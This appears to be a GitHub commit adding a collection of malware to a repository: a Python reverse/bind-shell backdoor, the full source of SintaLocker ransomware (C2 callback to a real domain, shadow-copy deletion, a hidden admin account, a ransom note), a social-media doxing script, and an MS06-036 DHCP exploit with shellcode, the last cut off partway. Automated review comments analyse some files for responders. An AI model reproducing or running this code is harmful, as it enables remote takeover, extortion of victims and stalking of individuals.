Add files via upload
This commit is contained in:
parent
f5ec68af9b
commit
9cbdb38457
BIN
Python/AngstStealer.7z
Normal file
BIN
Python/AngstStealer.7z
Normal file
Binary file not shown.
BIN
Python/Aris.7z
Normal file
BIN
Python/Aris.7z
Normal file
Binary file not shown.
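--- /dev/null
+++ b/Python/Backdoor.Python.RShell
@@ -0,0 +1,121 @@
+#!/usr/bin/env python
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
+# #
+# alpha #
+# #
+# #
+# usage: #
+# % ./d00r -b password port #
+# % ./d00r -r password port host #
+# % nc host port #
+# % nc -l -p port (please use netcat) #
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+
+
+import os, sys, socket, time
+
+
+# =================== var =======
+MAX_LEN=1024
+SHELL="/bin/zsh -c"
+TIME_OUT=300 #s
+PW=""
+PORT=""
+HOST=""
+
+
+# =================== funct =====
+# shell - exec command, return stdout, stderr; improvable
+def shell(cmd):
+sh_out=os.popen(SHELL+" "+cmd).readlines()
+nsh_out=""
+for i in range(len(sh_out)):
+nsh_out+=sh_out[i]
+return nsh_out
+
+# action?
+def action(conn):
+conn.send("\nPass?\n")
+try: pw_in=conn.recv(len(PW))
+except: print "timeout"
+else:
+if pw_in == PW:
+conn.send("j00 are on air!\n")
+while True:
+conn.send(">>> ")
+try:
+pcmd=conn.recv(MAX_LEN)
+except:
+print "timeout"
+return True
+else:
+#print "pcmd:",pcmd
+cmd=""#pcmd
+for i in range(len(pcmd)-1):
+cmd+=pcmd[i]
+if cmd==":dc":
+return True
+elif cmd==":sd":
+return False
+else:
+if len(cmd)>0:
+out=shell(cmd)
+conn.send(out)
+
+
+# =================== main ======
+argv=sys.argv
+
+if len(argv)<4:
+print "error; help: head -n 16 d00r.py"
+sys.exit(1)
+elif argv[1]=="-b":
+PW=argv[2]
+PORT=argv[3]
+elif argv[1]=="-r" and len(argv)>4:
+PW=argv[2]
+PORT=argv[3]
+HOST=argv[4]
+else: exit(1)
+
+PORT=int(PORT)
+print "PW:",PW,"PORT:",PORT,"HOST:",HOST
+
+#sys.argv[0]="d00r"
+
+# exit father proc
+if os.fork()!=0:
+sys.exit(0)
+
+# associate the socket
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(TIME_OUT)
+
+if argv[1]=="-b":
+sock.bind(('localhost', PORT))
+sock.listen(0)
+
+run=True
+while run:
+
+if argv[1]=="-r":
+try: sock.connect( (HOST, PORT) )
+except:
+print "host unreachable"
+time.sleep(5)
+else: run=action(sock)
+else:
+try: (conn,addr)=sock.accept()
+except:
+print "timeout"
+time.sleep(1)
+else: run=action(conn)
+
+# shutdown the sokcet
+if argv[1]=="-b": conn.shutdown(2)
+else:
+try: sock.send("")
+except: time.sleep(1)
+else: sock.shutdown(2)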
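Review bot: The bind mode only listens on the loopback interface, `sock.bind(('localhost', PORT))`, so the `nc host port` usage in the header cannot reach it from another machine; only the reverse (`-r`) mode hands a remote operator a shell, which matters when triaging which variant a sample was launched in. The password gate reads exactly `len(PW)` bytes with `conn.recv(len(PW))` and compares them to PW, so any bytes the client sends beyond that (the trailing newline from netcat, for instance) stay in the stream and are consumed as the first command, and the password itself crosses the wire in plaintext. Each command then reaches `os.popen(SHELL+" "+cmd)`, i.e. `/bin/zsh -c <input>`, with only the last byte of the received buffer stripped, so a `\r\n` client leaves a stray `\r` in the command. The fixed banners `\nPass?\n`, `j00 are on air!\n` and `>>> ` plus the `:dc`/`:sd` control tokens are stable strings that a network or file signature can key on; the `print "..."` statements and bare `except:` clauses mark this as Python 2 only.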
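--- /dev/null
+++ b/Python/CryPy_Source.py
@@ -0,0 +1,463 @@
+import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
+import SintaRegistery
+import SintaChangeWallpaper
+from Crypto import Random
+from Crypto.Cipher import AES
+rmsbrand = 'SintaLocker'
+newextns = 'sinta'
+encfolder = '__SINTA I LOVE YOU__'
+email_con = 'sinpayy@yandex.com'
+btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
+userhome = os.path.expanduser('~')
+my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
+wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
+victim_info = base64.b64encode(str(platform.uname()))
+configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
+glob_config = None
+try:
+glob_config = json.loads(urllib.urlopen(configurl).read())
+if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
+raise Exception('0x00001')
+except IOError:
+time.sleep(1)
+
+victim_id = glob_config[u'MRU_ID']
+victim_r = glob_config[u'MRU_UDP']
+victim_s = glob_config[u'MRU_PDP']
+try:
+os.system('bcdedit /set {default} recoveryenabled No')
+os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
+os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
+os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
+os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
+os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
+except WindowsError:
+pass
+
+def setWallpaper(imageUrl):
+try:
+wallpaper = SintaChangeWallpaper.ChangeWallpaper()
+wallpaper.downloadWallpaper(imageUrl)
+except:
+pass
+
+
+def persistance():
+try:
+SintaRegistery.addRegistery(os.path.realpath(__file__))
+except:
+pass
+
+
+def destroy_shadow_copy():
+try:
+os.system('vssadmin Delete Shadows /All /Quiet')
+except:
+pass
+
+
+def create_remote_desktop():
+try:
+os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
+os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
+os.system('net localgroup administrators ' + victim_r + ' /add')
+except:
+pass
+
+
+def write_instruction(dir, ext):
+try:
+files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
+files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
+except:
+pass
+
+
+def delete_file(filename):
+try:
+os.remove(filename)
+except:
+pass
+
+
+def find_files(root_dir):
+write_instruction(root_dir, 'md')
+extentions = ['*.txt',
+'*.exe',
+'*.php',
+'*.pl',
+'*.7z',
+'*.rar',
+'*.m4a',
+'*.wma',
+'*.avi',
+'*.wmv',
+'*.csv',
+'*.d3dbsp',
+'*.sc2save',
+'*.sie',
+'*.sum',
+'*.ibank',
+'*.t13',
+'*.t12',
+'*.qdf',
+'*.gdb',
+'*.tax',
+'*.pkpass',
+'*.bc6',
+'*.bc7',
+'*.bkp',
+'*.qic',
+'*.bkf',
+'*.sidn',
+'*.sidd',
+'*.mddata',
+'*.itl',
+'*.itdb',
+'*.icxs',
+'*.hvpl',
+'*.hplg',
+'*.hkdb',
+'*.mdbackup',
+'*.syncdb',
+'*.gho',
+'*.cas',
+'*.svg',
+'*.map',
+'*.wmo',
+'*.itm',
+'*.sb',
+'*.fos',
+'*.mcgame',
+'*.vdf',
+'*.ztmp',
+'*.sis',
+'*.sid',
+'*.ncf',
+'*.menu',
+'*.layout',
+'*.dmp',
+'*.blob',
+'*.esm',
+'*.001',
+'*.vtf',
+'*.dazip',
+'*.fpk',
+'*.mlx',
+'*.kf',
+'*.iwd',
+'*.vpk',
+'*.tor',
+'*.psk',
+'*.rim',
+'*.w3x',
+'*.fsh',
+'*.ntl',
+'*.arch00',
+'*.lvl',
+'*.snx',
+'*.cfr',
+'*.ff',
+'*.vpp_pc',
+'*.lrf',
+'*.m2',
+'*.mcmeta',
+'*.vfs0',
+'*.mpqge',
+'*.kdb',
+'*.db0',
+'*.mp3',
+'*.upx',
+'*.rofl',
+'*.hkx',
+'*.bar',
+'*.upk',
+'*.das',
+'*.iwi',
+'*.litemod',
+'*.asset',
+'*.forge',
+'*.ltx',
+'*.bsa',
+'*.apk',
+'*.re4',
+'*.sav',
+'*.lbf',
+'*.slm',
+'*.bik',
+'*.epk',
+'*.rgss3a',
+'*.pak',
+'*.big',
+'*.unity3d',
+'*.wotreplay',
+'*.xxx',
+'*.desc',
+'*.py',
+'*.m3u',
+'*.flv',
+'*.js',
+'*.css',
+'*.rb',
+'*.png',
+'*.jpeg',
+'*.p7c',
+'*.p7b',
+'*.p12',
+'*.pfx',
+'*.pem',
+'*.crt',
+'*.cer',
+'*.der',
+'*.x3f',
+'*.srw',
+'*.pef',
+'*.ptx',
+'*.r3d',
+'*.rw2',
+'*.rwl',
+'*.raw',
+'*.raf',
+'*.orf',
+'*.nrw',
+'*.mrwref',
+'*.mef',
+'*.erf',
+'*.kdc',
+'*.dcr',
+'*.cr2',
+'*.crw',
+'*.bay',
+'*.sr2',
+'*.srf',
+'*.arw',
+'*.3fr',
+'*.dng',
+'*.jpeg',
+'*.jpg',
+'*.cdr',
+'*.indd',
+'*.ai',
+'*.eps',
+'*.pdf',
+'*.pdd',
+'*.psd',
+'*.dbfv',
+'*.mdf',
+'*.wb2',
+'*.rtf',
+'*.wpd',
+'*.dxg',
+'*.xf',
+'*.dwg',
+'*.pst',
+'*.accdb',
+'*.mdb',
+'*.pptm',
+'*.pptx',
+'*.ppt',
+'*.xlk',
+'*.xlsb',
+'*.xlsm',
+'*.xlsx',
+'*.xls',
+'*.wps',
+'*.docm',
+'*.docx',
+'*.doc',
+'*.odb',
+'*.odc',
+'*.odm',
+'*.odp',
+'*.ods',
+'*.odt',
+'*.sql',
+'*.zip',
+'*.tar',
+'*.tar.gz',
+'*.tgz',
+'*.biz',
+'*.ocx',
+'*.html',
+'*.htm',
+'*.3gp',
+'*.srt',
+'*.cpp',
+'*.mid',
+'*.mkv',
+'*.mov',
+'*.asf',
+'*.mpeg',
+'*.vob',
+'*.mpg',
+'*.fla',
+'*.swf',
+'*.wav',
+'*.qcow2',
+'*.vdi',
+'*.vmdk',
+'*.vmx',
+'*.gpg',
+'*.aes',
+'*.ARC',
+'*.PAQ',
+'*.tar.bz2',
+'*.tbk',
+'*.bak',
+'*.djv',
+'*.djvu',
+'*.bmp',
+'*.cgm',
+'*.tif',
+'*.tiff',
+'*.NEF',
+'*.cmd',
+'*.class',
+'*.jar',
+'*.java',
+'*.asp',
+'*.brd',
+'*.sch',
+'*.dch',
+'*.dip',
+'*.vbs',
+'*.asm',
+'*.pas',
+'*.ldf',
+'*.ibd',
+'*.MYI',
+'*.MYD',
+'*.frm',
+'*.dbf',
+'*.SQLITEDB',
+'*.SQLITE3',
+'*.asc',
+'*.lay6',
+'*.lay',
+'*.ms11 (Security copy)',
+'*.sldm',
+'*.sldx',
+'*.ppsm',
+'*.ppsx',
+'*.ppam',
+'*.docb',
+'*.mml',
+'*.sxm',
+'*.otg',
+'*.slk',
+'*.xlw',
+'*.xlt',
+'*.xlm',
+'*.xlc',
+'*.dif',
+'*.stc',
+'*.sxc',
+'*.ots',
+'*.ods',
+'*.hwp',
+'*.dotm',
+'*.dotx',
+'*.docm',
+'*.DOT',
+'*.max',
+'*.xml',
+'*.uot',
+'*.stw',
+'*.sxw',
+'*.ott',
+'*.csr',
+'*.key',
+'wallet.dat']
+for dirpath, dirs, files in os.walk(root_dir):
+if 'Windows' not in dirpath:
+for basename in files:
+for ext in extentions:
+if fnmatch.fnmatch(basename, ext):
+filename = os.path.join(dirpath, basename)
+yield filename
+
+
+def make_directory(file_path):
+directory = file_path + '' + encfolder
+if not os.path.exists(directory):
+try:
+os.makedirs(directory)
+except:
+pass
+
+
+def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
+return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
+
+
+def generate_file(file_path, filename):
+make_directory(file_path)
+key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
+newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
+try:
+encrypt_file(key, filename, newfilename)
+except:
+pass
+
+
+def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
+if not out_filename:
+out_filename = newfilename
+iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
+encryptor = AES.new(key, AES.MODE_CBC, iv)
+filesize = os.path.getsize(in_filename)
+with open(in_filename, 'rb') as infile:
+with open(out_filename, 'wb') as outfile:
+outfile.write(struct.pack('<Q', filesize))
+outfile.write(iv)
+while True:
+chunk = infile.read(chunksize)
+if len(chunk) == 0:
+break
+elif len(chunk) % 16 != 0:
+chunk += ' ' * (16 - len(chunk) % 16)
+outfile.write(encryptor.encrypt(chunk))
+
+
+listdir = (userhome + '\\Contacts\\',
+userhome + '\\Documents\\',
+userhome + '\\Downloads\\',
+userhome + '\\Favorites\\',
+userhome + '\\Links\\',
+userhome + '\\My Documents\\',
+userhome + '\\My Music\\',
+userhome + '\\My Pictures\\',
+userhome + '\\My Videos\\',
+'D:\\',
+'E:\\',
+'F:\\',
+'G:\\',
+'I:\\',
+'J:\\',
+'K:\\',
+'L:\\',
+'M:\\',
+'N:\\',
+'O:\\',
+'P:\\',
+'Q:\\',
+'R:\\',
+'S:\\',
+'T:\\',
+'U:\\',
+'V:\\',
+'W:\\',
+'X:\\',
+'Y:\\',
+'Z:\\')
+for dir_ in listdir:
+for filename in find_files(dir_):
+generate_file(dir_, filename)
+delete_file(filename)
+
+persistance()
+destroy_shadow_copy()
+create_remote_desktop()
+write_instruction(userhome + '\\Desktop\\', 'txt')
+os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
+setWallpaper(wallpaper_link)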
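Review bot: The per-file AES key built in generate_file, `key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])`, is never written to disk, never sent to `my_server`, and is dropped when the function returns, so nothing in this file lets even the operator decrypt a victim's files; the ransom note's promise of a "decryption program" has no backing in the code shown (SintaRegistery and SintaChangeWallpaper are not visible, so a key upload there cannot be ruled out). The IV is likewise drawn from `random.randint` rather than a CSPRNG, and the plaintext is space-padded with only the `struct.pack('<Q', filesize)` prefix recording the true length. For responders the more durable damage is create_remote_desktop(): it sets fDenyTSConnections to 0 and creates a local administrator whose username and password (`victim_r`, `victim_s`) are supplied by the C2 response, so cleanup has to remove that account and re-apply the RDP, DisableRegistryTools/DisableTaskMgr/DisableCMD/NoRun and bcdedit recovery settings, not just restore files. Note also that if the C2 fetch fails, `except IOError` leaves glob_config as None and `glob_config[u'MRU_ID']` raises TypeError at module level before any file is touched, so blocking the `dobrebaseny.pl` path stops this build entirely.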
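--- /dev/null
+++ b/Python/Doxing-Script-Py3.py
@@ -0,0 +1,336 @@
+import os
+import requests
+import sys
+import subprocess
+import re
+import face_recognition
+import json
+
+done_checks = []
+social_media = []
+usernames = []
+emails = []
+twitter = []
+instagram = []
+steam = []
+urls = []
+urls_stalk = []
+urls_done = []
+name = ""
+adresse = ""
+compare = False
+first_dl = False
+
+def stalk(user):
+if len(user) > 1:
+global urls_stalk
+pastebin_url = "https://pastebin.com/u/" + user
+pastebin_str = "s Pastebin - Pastebin.com"
+patreon_url = "https://www.patreon.com/" + user
+patreon_str = 'created_at'
+gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
+gutefrage_str = '<meta name="title" content="Profil von'
+ebay_url = "https://www.ebay.de/usr/" + user
+ebay_str = '<span>Angemeldet seit: </span>'
+twitter_url = "https://twitter.com/" + user
+twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
+facebook_url = 'https://facebook.com/' + user
+facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
+instagram_url = "https://www.instagram.com/" + user + "/"
+instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
+steam_url = "https://steamcommunity.com/id/" + user
+steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
+twitch_url = "https://www.twitch.tv/" + user
+twitch_str = "content='twitch://stream/" + user
+lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
+lachschon_str = '<label>Rang</label>'
+
+URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
+STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
+
+for i in range(0, len(URLS)):
+html = getResponse(URLS[i])
+if STRS[i].lower() in str(html).lower():
+print("\t> " + URLS[i])
+urls_stalk.append(URLS[i])
+
+def get_twitter_img(user):
+url = "https://twitter.com/" + user
+html = subprocess.getoutput("phantomjs html.js " + url)
+image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
+r = requests.get(image)
+with open('Twitter.jpg', 'wb') as f:
+f.write(r.content)
+
+def get_instagram_img(user):
+data = {
+'username': user,
+'submit': 'View DP'
+}
+response = requests.post('https://fullinstadp.com/index.php', data=data)
+html = response.text
+f = open("Out.html", "w")
+f.write(html)
+f.close
+img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
+r = requests.get(img_url)
+with open('Instagram.jpg', 'wb') as f:
+f.write(r.content)
+
+def check_mail(string):
+EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
+if EMAIL_REGEX.match(string):
+return True
+else:
+return False
+
+def check_string_mail(string):
+global emails
+splitted = string.split(" ")
+for word in splitted:
+if check_mail(word):
+emails.append(word)
+
+def check_string_url(string):
+global urls
+for word in string.split(" "):
+try:
+url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
+if '//t.co/' in url:
+last = url[-1:]
+if last == ".":
+url = url.rstrip('.')
+r = requests.get(url)
+url = r.url
+urls.append(url)
+except:
+e = ""
+
+def check_string_socialmedia(string):
+global social_media
+count = 0
+next = 0
+for word in string.split(" "):
+next = count + 2
+if 'facebook' in word.lower():
+print(string.split(" ")[next])
+count +=1
+
+def youtube(url):
+url = url + "/about"
+html = subprocess.getoutput("phantomjs html.js " + url)
+tmp_str = html.split('"}},"urlEndpoint":')
+for url in tmp_str:
+#print(url)
+url = find_between(url, '{"url":"', '","target":')
+print(html)
+
+def grab_instagram(profile):
+global done_checks
+global urls
+global instagram
+global usernames
+global compare
+if not "instagram: " + profile in done_checks:
+if not profile in usernames:
+usernames.append(profile)
+url = "https://www.instagram.com/" + profile + "/"
+html = subprocess.getoutput("phantomjs html.js " + url)
+if '"@type":"Person","name":"' in html:
+display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
+if not display_name in usernames:
+usernames.append(display_name)
+if not "instagram: " + display_name in done_checks:
+print(display_name)
+stalk(display_name)
+instagram.append("Display Name: " + display_name)
+description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
+follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
+check_string_mail(description)
+check_string_url(description)
+instagram.append("Description: " + description)
+instagram.append("Follower: " + follower)
+#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
+compare = True
+if not "instagram: " + profile in done_checks:
+done_checks.append("instagram: " + profile)
+
+def grab_steam(url):
+global done_checks
+global urls
+global usernames
+if not "steam: " + profile in done_checks:
+url = url + "/ajaxaliases/"
+response = requests.get(url)
+html = response.text
+for item in html.split("newname"):
+username = find_between(item, '":"', '","timechanged')
+if not username in usernames:
+usernames.append(username)
+
+
+
+def grab_twitter(profile):
+global done_checks
+global urls
+global adresse
+global usernames
+global twitter
+global first_dl
+if not "twitter: " + profile in done_checks:
+url = "https://twitter.com/" + profile
+urls.append(url)
+html = subprocess.getoutput("phantomjs html.js " + url)
+#variables
+display_name = find_between(html, '<title>', ' (@')
+if not profile in usernames:
+usernames.append(profile)
+if not display_name in usernames:
+usernames.append(display_name)
+if not "twitter: " + display_name in done_checks:
+print(display_name)
+stalk(display_name)
+join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
+description = ""
+url = ""
+location = ""
+#if
+if '<meta name="description"' in html:
+description = find_between(html, '<meta name="description" content="', '">')
+description = description.replace(""", "")
+check_string_mail(description)
+check_string_url(description)
+if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
+tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
+url = find_between(tmp, '" title="', '">')
+urls.append(url)
+if 'location":"' in html:
+location = find_between(html, '"location":"', '","url')
+if len(location) > 0:
+adresse = location
+twitter.append("Display Name: " + display_name)
+twitter.append("Join Date: " + join_date)
+twitter.append("Description: " + description)
+twitter.append("URL: " + url)
+twitter.append("Location: " + location)
+twitter.append(" ")
+#if first_dl == False:
+#get_twitter_img(profile)
+#first_dl = True
+if not "twitter: " + profile in done_checks:
+done_checks.append("twitter: " + profile)
+
+
+
+def handle():
+try:
+if sys.argv[1]:
+social_media = sys.argv[1].lower()
+if sys.argv[2]:
+info_type = sys.argv[2].lower()
+if sys.argv[3]:
+infos = sys.argv[3].lower()
+if info_type == "url":
+if social_media == "youtube":
+youtube(infos)
+elif info_type == "profile":
+if social_media == "twitter":
+grab_twitter(infos)
+elif info_type == "user":
+if social_media == "stalk":
+stalk(infos)
+except Exception as e:
+print(e)
+
+def find_between( s, first, last ):
+try:
+start = s.index( first ) + len( first )
+end = s.index( last, start )
+return s[start:end]
+except ValueError:
+return ""
+
+def getResponse(url):
+response = requests.get(url)
+#response.raise_for_status()
+data = response.content
+return data
+
+
+
+handle()
+
+for url in urls_stalk:
+#print(url)
+if 'twitter.com' in url:
+checked = False
+profile = url.split("/")[3]
+for check in done_checks:
+if check == "twitter: " + profile:
+checked = True
+if not checked:
+grab_twitter(profile)
+done_checks.append("twitter:" + profile)
+
+if 'instagram.com' in url:
+checked = False
+profile = url.split("/")[3]
+for check in done_checks:
+if check == "instagram: " + profile:
+checked = True
+if not checked:
+grab_instagram(profile)
+#print("Download Profile Picture")
+done_checks.append("instagram: " + profile)
+#Steam Check direkt in der Stalk Funktion
+if 'steamcommunity.com' in url:
+checked = False
+profile = url.split("/")[4]
+for check in done_checks:
+if check == "steam: " + profile:
+checked = True
+if not checked:
+grab_steam(url)
+done_checks.append("steam: " + profile)
+
+
+print("------------------")
+print("Usernames:")
+print("------------------")
+for user in usernames:
+print(user)
+stalk(user)
+
+if len(urls) > 0:
+print("------------------")
+print("URLs:")
+print("------------------")
+for url in urls:
+print(url)
+
+if len(twitter) > 0:
+print("------------------")
+print("Twitter:")
+print("------------------")
+for item in twitter:
+print(item)
+
+if len(instagram) > 0:
+print("------------------")
+print("Instagram:")
+print("------------------")
+for item in instagram:
+print(item)
+
+if len(steam) > 0:
+print("------------------")
+print("Steam:")
+print("------------------")
+for item in steam:
+print(item)
+
+print("------------------")
+print("Sites checked:")
+print("------------------")
+for check in done_checks:
+print(check)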
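Review bot: Scraped web content reaches a local shell: `subprocess.getoutput("phantomjs html.js " + url)` in grab_twitter, grab_instagram and youtube builds a command string from `profile`/`url`, and `profile` can originate from a display name pulled out of a remote page (grab_instagram → `stalk(display_name)` → urls_stalk → the loop after `handle()`), so a name containing shell metacharacters is executed by whoever runs this script. Pass the arguments as a list at all three call sites instead, e.g. `html = subprocess.run(["phantomjs", "html.js", url], capture_output=True, text=True).stdout`. Smaller defects on the same lines: `f.close` in get_instagram_img is missing its call parentheses so Out.html is only closed by garbage collection, `grab_steam(url)` tests `"steam: " + profile` where `profile` is not its parameter and resolves only through the module-level loop variable, and `import face_recognition` is never used. Note too that get_instagram_img posts the target username to a third-party site (fullinstadp.com) with no TLS pinning or consent, which discloses the query itself.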
237
Python/Exploit.Python.Ms06-036.a
Normal file
237
Python/Exploit.Python.Ms06-036.a
Normal file
@ -0,0 +1,237 @@
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# by redsand@blacksecurity.org
|
||||
# this (like any thing) would not be possible w/out the bl4ck team.
|
||||
# thanks guys.
|
||||
#
|
||||
|
||||
import sys, os
|
||||
|
||||
sys.path.append("pydhcplib")
|
||||
|
||||
from scapy import *
|
||||
|
||||
from pydhcplib.dhcp_packet import *
|
||||
from pydhcplib.dhcp_network import *
|
||||
from pydhcplib.type_strlist import *
|
||||
from pydhcplib.type_ipv4 import *
|
||||
from pydhcplib.type_hw_addr import *
|
||||
|
||||
inet_face = "vmnet8"
|
||||
|
||||
default_ip = "10.31.33.7"
|
||||
|
||||
# user bl4ck/bl4ck
|
||||
# this exits via Thread (so thta we kill the dhcp thread in services.exe
|
||||
#
|
||||
# this means if services doesn't crash, it was a successful exploit
|
||||
#
|
||||
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
|
||||
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
|
||||
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
|
||||
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
|
||||
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
|
||||
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
|
||||
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
|
||||
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
|
||||
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
|
||||
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
|
||||
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
|
||||
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
|
||||
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
|
||||
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
|
||||
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
|
||||
|
||||
|
||||
|
||||
netopt = {'client_listen_port':"68",
|
||||
'server_listen_port':"67",
|
||||
'listen_address':"0.0.0.0"}
|
||||
|
||||
|
||||
def substr(i,o,off):
|
||||
begin=i[:off]
|
||||
end=i[off+len(o):]
|
||||
ret=begin+o+end
|
||||
return ret
|
||||
|
||||
def io(i):
|
||||
str=""
|
||||
a=chr(i % 256)
|
||||
i=i >> 8
|
||||
b=chr(i % 256)
|
||||
i=i >> 8
|
||||
c=chr(i % 256)
|
||||
i=i >> 8
|
||||
d=chr(i % 256)
|
||||
|
||||
str+="%c%c%c%c" % (a,b,c,d)
|
||||
|
||||
return str
|
||||
|
||||
class Server(DhcpServer):
|
||||
def __init__(self, options):
|
||||
DhcpServer.__init__(self,options["listen_address"],
|
||||
options["client_listen_port"],
|
||||
options["server_listen_port"])
|
||||
|
||||
def HandleDhcpDiscover(self, packet):
|
||||
my_reqip = ''
|
||||
|
||||
my_reqip = default_ip
|
||||
|
||||
sid_i = my_reqip.rfind(".")
|
||||
server_ip = my_reqip[0:sid_i] + ".254"
|
||||
|
||||
our_ip = my_reqip[0:sid_i] + ".2"
|
||||
|
||||
mymac = hwmac(packet.GetHardwareAddress()).str()
|
||||
print "** Received discover from %s (%s)" % (mymac,my_reqip)
|
||||
|
||||
mpacket = DhcpPacket()
|
||||
mpacket.CreateDhcpOfferPacketFrom(packet)
|
||||
mpacket.SetOption("dhcp_message_type",[2])
|
||||
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
|
||||
mpacket.SetOption("siaddr", ipv4(server_ip).list())
|
||||
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
|
||||
mpacket.SetOption("flags",[0,0])
|
||||
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
|
||||
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
|
||||
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
|
||||
mpacket.SetOption("router",ipv4(our_ip).list())
|
||||
|
||||
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
|
||||
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
